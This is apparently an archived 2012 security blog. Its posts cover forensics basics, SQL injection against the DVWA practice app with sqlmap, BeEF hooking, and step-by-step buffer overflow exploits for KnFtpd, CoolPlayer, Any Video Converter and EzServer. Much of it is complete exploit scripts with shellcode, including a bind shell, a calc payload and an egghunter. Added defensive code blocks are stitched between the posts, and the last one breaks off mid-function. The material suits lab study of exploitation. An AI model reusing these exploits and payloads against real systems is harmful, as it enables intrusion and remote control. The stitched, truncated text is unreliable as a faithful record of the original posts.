Sunday, 28 October 2012

Introduction to Forensic Basics

Computer Forensics

Computer forensics (sometimes known as computer forensic science) is a branch of digital forensic science pertaining to legal evidence found in computers and digital storage media. The goal of computer forensics is to examine digital media in a forensically sound manner with the aim of identifying, preserving, recovering, analyzing and presenting facts and opinions about the information.

Unallocated Space

Unallocated space, sometimes called “free space”, is logical space on a hard drive that the operating system, e.g. Windows, can write to. To put it another way, it is the opposite of “allocated” space, which is where the operating system has already written files.
Unallocated file space and file slack are both important sources of leads for the computer forensics investigator. The data storage area in a factory fresh hard disk drive typically contains patterns of sectors which are filled with patterns of format characters. In DOS and Windows-based computer systems, the format pattern for a floppy diskette usually consists of binary data in the form of hex F6s. The same format pattern is sometimes used in the format of hard disk drives but the format patterns can consist of essentially any repeat character as determined by the factory test machine that made the last writes to the hard disk drive. The format pattern is overwritten as files and subdirectories are written in the data area.

Slack Space
Slack space refers to portions of a hard drive that are not fully used by the current allocated file and which may contain data from a previously deleted file.
Illustration of slack space on a hard drive
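As an added illustration (not part of the original post), the following Python models the slack-space and format-pattern points above on a constructed in-memory "disk". The sector and cluster sizes are assumptions; a real tool would read the file system's own allocation metadata instead of a hard-coded allocated-cluster set.

```python
SECTOR = 512      # assumed sector size
CLUSTER = 4096    # assumed allocation unit (8 sectors), typical for an NTFS volume

def slack_bytes(file_size: int, cluster: int = CLUSTER) -> int:
    """Bytes between the logical end of a file and the end of its last cluster."""
    return 0 if file_size == 0 else (-file_size) % cluster

def build_image(old_file: bytes, new_file: bytes) -> bytearray:
    """Constructed four-cluster 'disk', not a real image: factory-fresh 0xF6 fill,
    one file written and then deleted (its bytes stay in place), then a shorter
    file written over the start of the same cluster.  The OS zero-fills the rest
    of the last sector it writes, so old bytes survive only in the later sectors."""
    img = bytearray(b"\xF6" * CLUSTER * 4)
    img[0:len(old_file)] = old_file              # first file occupies cluster 0
    img[0:len(new_file)] = new_file              # after 'deletion' a smaller file reuses it
    sector_end = len(new_file) + (-len(new_file)) % SECTOR
    img[len(new_file):sector_end] = b"\0" * (sector_end - len(new_file))
    return img

def carve_slack(img: bytes, file_size: int) -> bytes:
    """Slack of the live file: from its logical end to the end of its last cluster."""
    return bytes(img[file_size:file_size + slack_bytes(file_size)])

def unallocated_regions(img: bytes, allocated: set) -> list:
    """(offset, length) of every cluster that no live file owns."""
    count = len(img) // CLUSTER
    return [(i * CLUSTER, CLUSTER) for i in range(count) if i not in allocated]

def is_factory_fresh(region: bytes) -> bool:
    """True if the region still holds only the 0xF6 format pattern (never written)."""
    return len(region) > 0 and set(region) == {0xF6}

if __name__ == "__main__":
    old = b"password=hunter2 " * 100      # constructed 'deleted' file, 1700 bytes
    new = b"hello world"                  # constructed live file, 11 bytes
    img = build_image(old, new)
    slack = carve_slack(img, len(new))
    print(len(slack), b"hunter2" in slack, unallocated_regions(img, {0}))
    print(is_factory_fresh(img[CLUSTER:2 * CLUSTER]))
```

The first sector after the live file's end comes back zeroed, while the rest of the cluster still carries the deleted file's content; cluster 1 onward is untouched format fill, i.e. unallocated space that was never written.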

Tuesday, 23 October 2012

DVWA Exploit (Medium)

1. Open your DVWA and log in
   username = admin
   password = password


2. Set the DVWA security level to Medium


3. Then choose SQL Injection and click Submit

   Check the cookie in Burp Suite
4. Open a terminal and change directory to the "sqlmap" folder
5. Run sqlmap with the cookie and the result of the last submit

./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=%27&Submit=Submit#" --cookie "security=medium; PHPSESSID=rgqbqifchg5sdoaadnahfdotg5"

and this is the result
6. Search for users and passwords
./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=%27&Submit=Submit#" --cookie "security=medium; PHPSESSID=rgqbqifchg5sdoaadnahfdotg5" --users --passwords

and this is the result
Sorry, not root yet; I am still trying to get root.
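An added example, not from the post and not DVWA's source: three versions of the same `id` lookup in Python with SQLite (a constructed table, not DVWA's schema), showing why string building and escape-only filtering remain injectable while a validated, bound parameter is not.

```python
import sqlite3

def make_db() -> sqlite3.Connection:
    """Constructed users table in an in-memory SQLite database (not DVWA's schema)."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (user_id INTEGER PRIMARY KEY, first_name TEXT, last_name TEXT)")
    con.executemany("INSERT INTO users VALUES (?, ?, ?)",
                    [(1, "admin", "admin"), (2, "Gordon", "Brown"), (3, "Pablo", "Picasso")])
    return con

def lookup_concat(con, user_id: str) -> list:
    """Vulnerable: the id parameter is pasted into the SQL text inside quotes."""
    sql = "SELECT first_name, last_name FROM users WHERE user_id = '%s'" % user_id
    return con.execute(sql).fetchall()

def lookup_escape_only(con, user_id: str) -> list:
    """Still vulnerable: quotes are doubled, but the value is used unquoted in a
    numeric comparison, so input that contains no quote is parsed as SQL."""
    sql = "SELECT first_name, last_name FROM users WHERE user_id = %s" % user_id.replace("'", "''")
    return con.execute(sql).fetchall()

def lookup_parameterized(con, user_id: str) -> list:
    """Hardened: the id is validated as an integer and bound as a parameter,
    so it is never parsed as part of the statement."""
    try:
        uid = int(user_id)
    except ValueError:
        return []
    sql = "SELECT first_name, last_name FROM users WHERE user_id = ?"
    return con.execute(sql, (uid,)).fetchall()

if __name__ == "__main__":
    con = make_db()
    probe = "1' OR '1'='1"          # the quote the writeup sends as id=%27, with a tautology
    print(lookup_concat(con, probe))                  # every row leaks
    print(lookup_escape_only(con, "1 OR 1=1"))        # every row leaks without any quote
    print(lookup_parameterized(con, "1 OR 1=1"))      # rejected: []
```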

Friday, 19 October 2012

Combining Windows with a Metasploit Exploit and BeEF


1. Start BeEF

2. Open the URL http://127.0.0.1:3000/ui/panel, and this is the result
3. Log in before entering the BeEF home panel; the username and password are both "beef"



and this is the result after login


4. Make a file "victim.html" to place the BeEF hook in


5. Look at the result: it will display an alert dialog according to what was entered in the BeEF home panel.

execute the alert dialog from the BeEF panel
6. Open msfconsole






Sunday, 14 October 2012

How to Use POP POP RETN

POP POP RETN is used to bypass the SEH handler in an application. A regular application is usually protected by SafeSEH, which serves to protect the SEH handler, so we need a module that is not protected by SafeSEH; usually the application's own default modules are not protected by SafeSEH.
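A defensive counterpart to the paragraph above, added here and not the author's code: a Python check that reads a PE32's load configuration directory and reports whether a module registered a SafeSEH handler table, the property that decides whether the loader validates exception handlers pointing into that module. `build_pe32` constructs a minimal test image; the offsets follow the PE file format.

```python
import struct

LOAD_CONFIG = 10        # IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
NO_SEH = 0x0400         # IMAGE_DLLCHARACTERISTICS_NO_SEH

def safeseh_status(pe: bytes) -> str:
    """'safeseh' if the PE32 registers a handler table (only listed addresses may
    serve as SEH handlers), 'no_seh' if it declares it uses no handlers, else
    'unprotected' (the OS cannot validate handlers pointing into this module)."""
    e_lfanew, = struct.unpack_from("<I", pe, 0x3C)
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("not a PE image")
    coff = e_lfanew + 4
    nsect, = struct.unpack_from("<H", pe, coff + 2)
    opt_size, = struct.unpack_from("<H", pe, coff + 16)
    opt = coff + 20
    if struct.unpack_from("<H", pe, opt)[0] != 0x10B:
        raise ValueError("only PE32 (x86) images carry a SafeSEH handler table")
    if struct.unpack_from("<H", pe, opt + 70)[0] & NO_SEH:
        return "no_seh"
    lc_rva, lc_size = struct.unpack_from("<II", pe, opt + 96 + 8 * LOAD_CONFIG)
    if lc_rva == 0 or lc_size < 72:
        return "unprotected"                  # no load config: built without /SAFESEH
    for i in range(nsect):                    # map the RVA through the section table
        va, raw, ptr = struct.unpack_from("<III", pe, opt + opt_size + 40 * i + 12)
        if va <= lc_rva < va + raw:
            table, = struct.unpack_from("<I", pe, ptr + lc_rva - va + 64)  # SEHandlerTable
            return "safeseh" if table else "unprotected"
    return "unprotected"

def build_pe32(safeseh: bool, no_seh: bool = False) -> bytes:
    """Constructed minimal PE32 for testing, not a real binary: one section at
    RVA 0x1000 / file offset 0x200 holding a load config when safeseh is set."""
    dos = b"MZ" + b"\0" * 58 + struct.pack("<I", 0x40)              # e_lfanew = 0x40
    coff = struct.pack("<HHIIIHH", 0x14C, 1, 0, 0, 0, 224, 0x2102)   # i386, 1 section
    opt = bytearray(224)
    struct.pack_into("<H", opt, 0, 0x10B)                            # PE32 magic
    struct.pack_into("<H", opt, 70, NO_SEH if no_seh else 0)         # DllCharacteristics
    struct.pack_into("<I", opt, 92, 16)                              # NumberOfRvaAndSizes
    if safeseh:
        struct.pack_into("<II", opt, 96 + 8 * LOAD_CONFIG, 0x1000, 72)
    sect = b".rdata\0\0" + struct.pack("<IIII", 0x200, 0x1000, 0x200, 0x200) + b"\0" * 16
    lc = bytearray(72)
    struct.pack_into("<I", lc, 0, 72)                                # Size
    if safeseh:
        struct.pack_into("<II", lc, 64, 0x1100, 1)                   # SEHandlerTable, SEHandlerCount
    head = (dos + b"PE\0\0" + coff + bytes(opt) + sect).ljust(0x200, b"\0")
    return head + bytes(lc).ljust(0x200, b"\0")
```

Run `safeseh_status(open(path, "rb").read())` over each DLL a process loads to list the modules that would not be covered by SafeSEH; on a 64-bit image the function raises, since x64 uses table-based unwinding instead.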

Monday, 08 October 2012

KnFtpd 1.0.0 exploit

1. Make the fuzzer

#!/usr/bin/python
import socket
target_address="192.168.56.101"
target_port=21
buffer = "\x41" * 3000
sock=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
connect=sock.connect((target_address,target_port))
sock.send(buffer)
print("yes")
sock.close()

Open KnFtpd and OllyDbg, run the fuzzer, and this is the result.
After fuzzing, look at EIP and the SEH chain.
This is the result after pressing Shift + F9 in the SEH chain.

2. Create the pattern offset and results
Edit the fuzzer file to become
#!/usr/bin/python
import socket
target_address="192.168.56.101"
target_port=21
#buffer = "\x41" * 3000
buffer = "Aa0Aa1Aa2Aa3Aa4A........." #result generate offset

sock=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
connect=sock.connect((target_address,target_port))
sock.send(buffer)
print("yes")
sock.close()

3. Search for a POP r32, POP r32, RETN address, and this is the result

Edit your fuzzer file to become

#!/usr/bin/python
import socket
target_address="192.168.56.101"
target_port=21
buffer = "\x41" * 3000
buffer ="\x41"* 322

buffer+="\x23\x37\x40\x00"
buffer+="\x41"* (3000 - len(buffer))

sock=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
connect=sock.connect((target_address,target_port))
sock.send(buffer)
print("yes")
sock.close()





and run the fuzzer; this is the result


4. Check with DEADBEEF
Again, edit your fuzzer file to become

#!/usr/bin/python
import socket
target_address="192.168.56.101"
target_port=21
buffer = "\x41" * 3000
buffer ="\x41"* 322

#buffer+="\xef\xbe\xad\xde"
buffer+="\x23\x37\x40\x00"
buffer+="\x41"* (3000 - len(buffer))

sock=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
connect=sock.connect((target_address,target_port))
sock.send(buffer)
print("yes")
sock.close()






and this is the result
After that, check for JMP ESP; I use kernel32.dll. Check this result.


CoolPlayer Exploit (Local)

1. Make the fuzzer file, as shown below:
myfile="cool.m3u"
myjunk="\x41" * 500
file=open(myfile,'w')
file.write(myjunk)
print"Yess.."
file.close()


Then run CoolPlayer under OllyDbg, load the file "cool.m3u", and it crashes. Look at the EIP register in OllyDbg: it is overwritten.

 
Check the SEH chain, and this is the result; then press Shift + F9




2. Generate the pattern, and copy the generated pattern into this fuzzer file, which becomes:
myfile="cool.m3u"
myjunk=("Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7"
        "Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9"
        "Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7"
        "Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8"
        "Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3"
        "Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5"
        "Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6"
        "Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq")  # pattern as pasted in the post
file=open(myfile,'w')
file.write(myjunk)
print "Yess.."
file.close()


Run CoolPlayer and OllyDbg, load the file and fuzz, and this is the resulting EIP value

3. Check with DEADBEEF; before checking with DEADBEEF, compute the pattern offset

Edit our fuzzer file to become

myfile="cool.m3u"
myjunk="\x90" * 260
myjunk+="\xEF\xBE\xAD\xDE"
file=open(myfile,'w')
file.write(myjunk)
print"Yess.."
file.close()

and this is the result
4. Find a JMP ESP
Choose Executable Modules; here I use shell32.dll. Double-click shell32.dll, then right-click, Search for, Command, and type JMP ESP.

and this is the result

Press Shift + F9 to check the stack, and this is the result

5. Edit your fuzzer file to pop the calculator, which proves that the offset is correct. Open a browser, go to 127.0.0.1:55555, and choose payload - windows execute command, as below



#!/usr/bin/python
myfile="cool.m3u"
myjunk="\x90" * 260
myjunk+="\xD7\x30\x9D\x7C"
myjunk+="\x90" * 16
myjunk+=("\xdb\xdc\xb8\x76\x35\x3c\x23\x2b\xc9\xb1\x23\xd9\x74\x24\xf4\x5f"
"\x83\xef\xfc\x31\x47\x13\x03\x31\x26\xde\xd6\x41\xa0\x5a\x19\xb9"
"\x31\xe8\x5c\x85\xba\x92\x5b\x8d\xbd\x85\xef\x22\xa6\xd2\xaf\x9c"
"\xd7\x0f\x06\x57\xe3\x44\x98\x89\x3d\x9b\x02\xf9\xba\xdb\x41\x06"
"\x02\x11\xa4\x09\x46\x4d\x43\x32\x12\xb6\xa8\x31\x7f\x3d\xef\x9d"
"\x7e\xa9\x76\x56\x8c\x66\xfc\x37\x91\x79\xe9\x4c\xb5\xf2\xec\xb9"
"\x4f\x58\xcb\x39\x93\x50\xd3\x25\x98\xd3\xe3\x20\x5e\xab\x0f\xa1"
"\x1f\x40\x9b\xc5\x83\xf5\x10\x4d\xb4\xee\x2e\x06\x44\x40\x30\x18"
"\x45\x2a\x59\x24\x1a\x1d\x6c\x34\xf2\xd4\x68\x37\x3a\x9d\xd8\x5f"
"\x4b\xe8\xdd\xc0\xc3\x75\x23\x74\x1d\xd1\x23\x6f\x41\xbc\xb7\x0c"
"\x86")
file=open(myfile,'w')
file.write(myjunk)
print"Yess.."
file.close()

 

Run CoolPlayer and load the fuzzer file made before, and this is the result
 

Sunday, 07 October 2012

Exploit Any Video Converter (Local)



1. Make the fuzzer file, named "fuzzerany.py"

#!/usr/bin/python
namafile="profiles_v2.xml"
junk = "\x41" * 700
buff="<root>\n"
buff=buff + "<categories>\n"
buff=buff + "<category name=\""+junk+"\" id=\"0\" icon=\"cat_all.bmp\" desc=\"All Profiles\"/>\n"
buff=buff + "</categories>\n"
buff=buff + "<groups></groups>\n<profiles></profiles>\n</root>\n"

file=open(namafile,"w")
file.write(buff)
print("berhasil yes...")
file.close()

2. Copy the file produced by the fuzzer into the Any Video Converter folder, run Any Video Converter and then OllyDbg, and observe the result; the EIP register will be as shown below

View the SEH chain and press Shift + F9, and this is the result
 
 
3. Create the pattern and compute the pattern offset


4. Search for a POP r32, POP r32, RETN address, and this is the result


5. Copy the DVCAPTURE dll file from Windows to Linux, paste it into the folder root/tmp, and run "./msfpescan"


6. Edit your "fuzzerany.py" to become

#!/usr/bin/python
namafile="profiles_v2.xml"
junk = "\x90" * 328
junk+="\xcc\xcc\xcc\xcc"
junk+="\x41\x41\x41\x41"
buff="<root>\n"
buff=buff + "<categories>\n"
buff=buff + "<category name=\""+junk+"\" id=\"0\" icon=\"cat_all.bmp\" desc=\"All Profiles\"/>\n"
buff=buff + "</categories>\n"
buff=buff + "<groups></groups>\n<profiles></profiles>\n</root>\n"

file=open(namafile,"w")
file.write(buff)
print("berhasil yes...")
file.close()

7. And lastly, add the generated payload.
Start "msfweb", open a browser and type "127.0.0.1:55555", choose payload, Microsoft bind shell, as shown below

After the generated payload appears, edit the file to become:
 
#!/usr/bin/python
namafile="profiles_v2.xml"

junk="\x90"* 328
junk+="\xeb\x06\x90\x90"
junk+="\x33\xE6\x01\x10"
junk+="\x90" * 16

shellcode=("\xba\x60\xf6\x4d\x9a\xda\xcc\xd9\x74\x24\xf4\x58\x33\xc9\xb1\x51"
"\x83\xc0\x04\x31\x50\x0e\x03\x30\xf8\xaf\x6f\x4c\x6e\xdb\xdd\x44"
"\x96\xe4\x21\x6b\x09\x90\xb2\xb7\xee\x2d\x0f\x8b\x65\x4d\x95\x8b"
"\x78\x41\x1e\x24\x63\x16\x7e\x9a\x92\xc3\xc8\x51\xa0\x98\xca\x8b"
"\xf8\x5e\x55\xff\x7f\x9e\x12\xf8\xbe\xd5\xd6\x07\x83\x01\x1c\x3c"
"\x57\xf2\xf5\x37\xb2\x71\x5a\x93\x3d\x6d\x03\x50\x31\x3a\x47\x39"
"\x56\xbd\xbc\xc6\x4a\x36\xcb\xa4\xb6\x54\xad\xf7\x86\xbf\x49\x7c"
"\xab\x0f\x19\xc2\x20\xfb\x6d\xde\x95\x70\xcd\xd6\xbb\xee\x40\xa8"
"\x4d\x03\x0c\xcb\x84\xbd\xfe\x55\x41\x71\x33\xf1\xe6\x06\x01\x5e"
"\x5d\x16\xb5\x08\x96\x05\xca\xf3\x78\x29\xe5\x5c\xf0\x30\x6c\xe3"
"\xef\xb3\x73\xb6\x85\xc1\x8c\xe8\x32\x1f\x7b\xfd\x6e\xc8\x83\x2b"
"\x23\xa4\x28\x80\x97\x09\x9c\x65\x4b\x71\xf2\x0f\x03\x9c\xaf\xa9"
"\x80\x17\xae\xa0\x4f\x8c\x2b\xba\x48\x9b\xb4\xec\x3d\x34\x1a\x45"
"\x3d\xe4\xf4\xc1\x6c\x2b\xec\x5e\x90\xe2\xbd\x35\x91\xdb\x2a\x50"
"\x24\x5a\xe3\xcd\x48\xb4\xa4\xa5\xe2\x6c\xba\x95\x98\xe7\xa3\x6c"
"\x59\x8e\x7c\x71\xb3\x24\x7c\x5d\x5a\xad\xe6\x3b\xcb\x52\x8a\x4a"
"\xee\xff\x04\x15\xd8\x33\x2d\x42\x70\x88\xa7\x6e\xb4\xd0\x4b\xc4"
"\x49\x92\x86\xe6\xf4\x3f\x4a\x9b\x83\x07\xc7\x08\xd8\x10\x65\xb0"
"\xac\xf7\x76\x39\x97\x08\x5e\x9a\x40\xa5\x0e\x4d\x3e\x23\xb0\x3c"
"\x91\xe6\xe3\x41\xc1\x61\xa9\x64\xe7\xbf\xe2\x69\x3e\x55\xfa\x6a"
"\x88\x55\xd4\x1f\xa0\x55\x56\xdb\x2b\x59\x8f\xb1\x4c\x75\x58\x4b"
"\x6b\x94\xea\xe0\x74\x8f\xf2\xd6"
)

buff="<root>\n"
buff=buff + "<categories>\n"
buff=buff + "<category name=\""+junk+shellcode+"\" id=\"0\" icon=\"cat_all.bmp\" desc=\"All Profiles\"/>\n"
buff=buff + "</categories>\n"
buff=buff + "<groups></groups>\n<profiles></profiles>\n</root>\n"

file=open(namafile,"w")
file.write(buff)
print("berhasil yes...")
file.close()

Then run Any Video Converter and it crashes

Use telnet or nc in a terminal on BackTrack to get into the Windows system
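An added detection example, not the blog's code, serving both the CoolPlayer .m3u and the profiles_v2.xml fuzz files above: the checks a file-scanning rule or a hardened loader could apply before handing a playlist or profile file to a fragile parser. The length and run thresholds are assumptions, and the samples are constructed to mirror the fuzzers' output rather than taken from the post.

```python
import re
import xml.etree.ElementTree as ET

MAX_FIELD = 256    # assumed upper bound for a playlist entry or an XML attribute value
RUN = 16           # assumed: this many identical bytes in a row is padding, not content

def repeated_runs(data: bytes) -> list:
    """Offsets of runs of one repeated byte (NOP sleds, 'A' padding) of length >= RUN."""
    return [m.start() for m in re.finditer(rb"(.)\1{%d,}" % (RUN - 1), data, re.S)]

def check_m3u(data: bytes) -> list:
    """Findings for an .m3u playlist: printable, bounded path per line, no padding runs."""
    findings = []
    for n, line in enumerate(data.splitlines(), 1):
        if line.startswith(b"#"):
            continue                                   # #EXTM3U / #EXTINF directives
        if len(line) > MAX_FIELD:
            findings.append(f"line {n}: entry of {len(line)} bytes exceeds {MAX_FIELD}")
        if any(b < 0x20 or b > 0x7E for b in line.rstrip(b"\r")):
            findings.append(f"line {n}: non-printable bytes in entry")
    return findings + [f"offset {o}: repeated-byte run" for o in repeated_runs(data)]

def check_profiles_xml(data: bytes) -> list:
    """Findings for profiles_v2.xml: must parse, and every attribute stays bounded."""
    try:
        root = ET.fromstring(data)
    except ET.ParseError as err:                       # raw 0x90 bytes are not valid UTF-8
        return [f"not well-formed XML: {err}"] + [f"offset {o}: repeated-byte run" for o in repeated_runs(data)]
    findings = []
    for el in root.iter():
        for name, value in el.attrib.items():
            if len(value) > MAX_FIELD:
                findings.append(f"<{el.tag} {name}>: {len(value)} chars exceeds {MAX_FIELD}")
    return findings

# Constructed samples mirroring the fuzz files above (not the blog's output files).
M3U_SAMPLE = b"#EXTM3U\r\nC:\\Music\\song.mp3\r\n" + b"\x41" * 500 + b"\r\n"
XML_SAMPLE = (b'<root>\n<categories>\n<category name="' + b"\x90" * 328 + b"\xcc" * 4
              + b'" id="0" icon="cat_all.bmp" desc="All Profiles"/>\n</categories>\n'
              b"<groups></groups>\n<profiles></profiles>\n</root>\n")

if __name__ == "__main__":
    for finding in check_m3u(M3U_SAMPLE) + check_profiles_xml(XML_SAMPLE):
        print(finding)
```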
 
  





Wednesday, 03 October 2012

EzServer PART II

In the last post I did not get into the Windows system, because there was a problem with the stack calculation. OK, let's discuss it again.

1. See, we did not finish at the "telnet" statement; this is the solution.
Edit our fuzzer file "fuzzereasy.py" to become

#!/usr/bin/python
import socket
target_address="192.168.56.101"
target_port=8000
buffer="\x90" * 5879
buffer+="\xeb\x06\x90\x90"
buffer+="\x96\x96\x20\x10"

buffer+="\x90" * (5954-len(buffer))
buffer+="\r\n\r\n"
#buffer= "\x41" * 6000 + "\r\n\r\n"
sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=sock.connect((target_address, target_port))
sock.send('GET /'+buffer+'HTTP/1.1')
print("Yes")
sock.close()


and run the fuzzer "fuzzerserver.py"

2. To check whether the calculation is correct or not, we use "calc".
Open a browser and type "127.0.0.1:55555", choose payload - windows execute command, and fill in the dialog box as in the picture below

Click generate payload, and this is the result


Then edit our fuzzer file to become

#!/usr/bin/python
import socket
target_address="192.168.56.101"
target_port=8000
buffer="\x90" * 5879
buffer+="\xeb\x06\x90\x90"
buffer+="\x96\x96\x20\x10"
buffer+="\x90" * (5954-len(buffer))
buffer+=("\x33\xc9\x83\xe9\xde\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xb5"
"\xde\x82\x48\x83\xeb\xfc\xe2\xf4\x49\x36\xc6\x48\xb5\xde\x09\x0d"
"\x89\x55\xfe\x4d\xcd\xdf\x6d\xc3\xfa\xc6\x09\x17\x95\xdf\x69\x01"
"\x3e\xea\x09\x49\x5b\xef\x42\xd1\x19\x5a\x42\x3c\xb2\x1f\x48\x45"
"\xb4\x1c\x69\xbc\x8e\x8a\xa6\x4c\xc0\x3b\x09\x17\x91\xdf\x69\x2e"
"\x3e\xd2\xc9\xc3\xea\xc2\x83\xa3\x3e\xc2\x09\x49\x5e\x57\xde\x6c"
"\xb1\x1d\xb3\x88\xd1\x55\xc2\x78\x30\x1e\xfa\x44\x3e\x9e\x8e\xc3"
"\xc5\xc2\x2f\xc3\xdd\xd6\x69\x41\x3e\x5e\x32\x48\xb5\xde\x09\x20"
"\x89\x81\xb3\xbe\xd5\x88\x0b\xb0\x36\x1e\xf9\x18\xdd\x2e\x08\x4c"
"\xea\xb6\x1a\xb6\x3f\xd0\xd5\xb7\x52\xbd\xe3\x24\xd6\xde\x82\x48")
buffer+="\r\n\r\n"
#buffer= "\x41" * 6000 + "\r\n\r\n"
sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=sock.connect((target_address, target_port))
sock.send('GET /'+buffer+'HTTP/1.1')
print("Yes")
sock.close()












Run EzServer without running OllyDbg, and run the fuzzer.


EzServer running before fuzzing

and after fuzzing


If the calculator appears then the offset value is correct

3. Lastly, make an egghunter; edit the fuzzer file.
Put the payload from the Metasploit Framework in, copying the generated payload into the fuzzer file, which becomes:

#!/usr/bin/python
import socket
target_address="192.168.56.101"
target_port=8000
#buffer="\x90" * 5879
buffer="\x90" * 5457


hunt = ("\x66\x81\xCA\xFF\x0F\x42\x52\x6A"
"\x02\x58\xCD\x2E\x3C\x05\x5A\x74"
"\xEF\xB8\x77\x30\x30\x74\x8B\xFA"
"\xAF\x75\xEA\xAF\x75\xE7\xFF\xE7")


payload = ("\xbe\x84\x65\x5d\x58\xda\xd9\x29\xc9\xb1\x51\xd9\x74\x24\xf4\x5b"
"\x31\x73\x12\x83\xc3\x04\x03\xf7\x6b\xbf\xad\x0b\x19\xd4\x03\x1b"
"\x27\xd5\x63\x24\xb8\xa1\xf0\xfe\x1d\x3d\x4d\xc2\xd6\x3d\x4b\x42"
"\xe8\x52\xd8\xfd\xf2\x27\x80\x21\x02\xd3\x76\xaa\x30\xa8\x88\x42"
"\x09\x6e\x13\x36\xee\xae\x50\x41\x2e\xe4\x94\x4c\x72\x12\x52\x75"
"\x26\xc1\xb3\xfc\x23\x82\x9b\xda\xaa\x7e\x45\xa9\xa1\xcb\x01\xf2"
"\xa5\xca\xfe\x0f\xfa\x47\x89\x63\x26\x44\xeb\xb8\x17\xaf\x8f\xb5"
"\x1b\x7f\xdb\x89\x97\xf4\xab\x15\x05\x81\x0c\x2d\x0b\xfe\x02\x63"
"\xbd\x12\x4a\x84\x17\x8c\x38\x1c\xf0\x62\x8d\x88\x77\xf6\xc3\x17"
"\x2c\x07\xf3\xcf\x07\x1a\x08\x34\xc8\x1a\x27\x15\x61\x01\xae\x28"
"\x9c\xc2\x2d\x7f\x35\xd1\xce\xaf\xa1\x0c\x39\xba\x9f\xf8\xc5\x92"
"\xb3\x55\x69\x49\x67\x19\xde\x2e\xd4\x62\x30\xd6\xb2\x8d\xed\x70"
"\x10\x27\xec\xe9\xfe\x93\xf5\x61\x38\x8c\xf6\x57\xac\x23\x58\x02"
"\xce\x94\x32\x08\x9d\x3b\x2a\x07\x21\x95\xff\xf2\x22\xca\x68\x19"
"\x95\x6d\x21\xb6\xd9\xa4\xe2\x6c\x72\x1c\xfc\x5c\xe9\xf6\xe5\x25"
"\xc8\x7e\xbd\x2a\x02\xd5\xbe\x04\xcd\xbc\x24\xc2\x7a\x22\xc8\x83"
"\x9e\xce\x42\xca\x49\xc3\xea\x0b\xe3\x9f\x65\x31\xc5\xdf\x85\x1f"
"\xd8\xa2\x44\xa1\x67\x0f\x04\xd0\x12\x77\x81\x41\x49\xef\xa7\x6b"
"\x3d\xe6\xb8\xe6\x06\xf8\x91\x53\xd0\x54\x4f\x32\x8f\x32\x6e\xe5"
"\x7e\x96\x21\xfa\x51\x70\x6f\xdd\x57\x4f\x3c\x22\x81\x25\x3c\x23"
"\x19\x45\x12\x50\x31\x45\x10\xa2\xda\x4a\xc1\x78\xdc\x65\x86\x8c"
"\xa8\x82\x08\x3f\x52\x5c\x49\x6f")



buffer+= "w00tw00t"
buffer+= payload
buffer+= "\x90" * 70
buffer+= "\xeb\x06\x90\x90"
buffer+= "\x96\x96\x20\x10"
buffer+= "\x90" * 16
buffer+= hunt
sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=sock.connect((target_address, target_port))
sock.send('GET /'+buffer+'HTTP/1.1')
print("Yes")
sock.close()
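An added example, not the author's code, covering the KnFtpd and EzServer traffic above from the defending side: request-line and FTP-command sanity checks a server or a network sensor can apply, plus content signatures for the egg tag and the egghunter stub used in the script, run over constructed samples shaped like the fuzzers' sends. The size limits are assumptions.

```python
import re

MAX_REQUEST_LINE = 2048     # assumed server limit for "METHOD SP URI SP HTTP/1.x"
MAX_FTP_ARG = 512           # assumed limit for one FTP command argument
EGG_TAG = b"w00tw00t"       # the egg marker used by the egghunter script above
HUNTER_STUB = b"\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e"   # first 12 bytes of the hunt stub above

def signature_hits(data: bytes) -> list:
    """Content signatures that have no place in a legitimate request."""
    hits = []
    if EGG_TAG in data:
        hits.append("egg tag present")
    if HUNTER_STUB in data:
        hits.append("egghunter stub present")
    return hits

def check_http_request(data: bytes) -> list:
    """Findings for a raw HTTP request as the server's parser first sees it."""
    line = data.partition(b"\r\n")[0]
    findings = []
    if len(line) > MAX_REQUEST_LINE:
        findings.append(f"request line of {len(line)} bytes exceeds {MAX_REQUEST_LINE}")
    if not re.fullmatch(rb"[A-Z]{3,7} [\x21-\x7e]+ HTTP/1\.[01]", line):
        findings.append("request line is not METHOD SP URI SP HTTP/1.x")
    return findings + signature_hits(data)

def check_ftp_command(data: bytes) -> list:
    """Findings for one FTP control line: '<verb> [<arg>]' terminated by CRLF (RFC 959)."""
    findings = []
    if not data.endswith(b"\r\n"):
        findings.append("command not CRLF-terminated")
    m = re.fullmatch(rb"([A-Za-z]{3,4})(?: ([\x20-\x7e]*))?", data.rstrip(b"\r\n"))
    if not m:
        findings.append("command is not '<verb> [<arg>]' in printable ASCII")
    elif m.group(2) and len(m.group(2)) > MAX_FTP_ARG:
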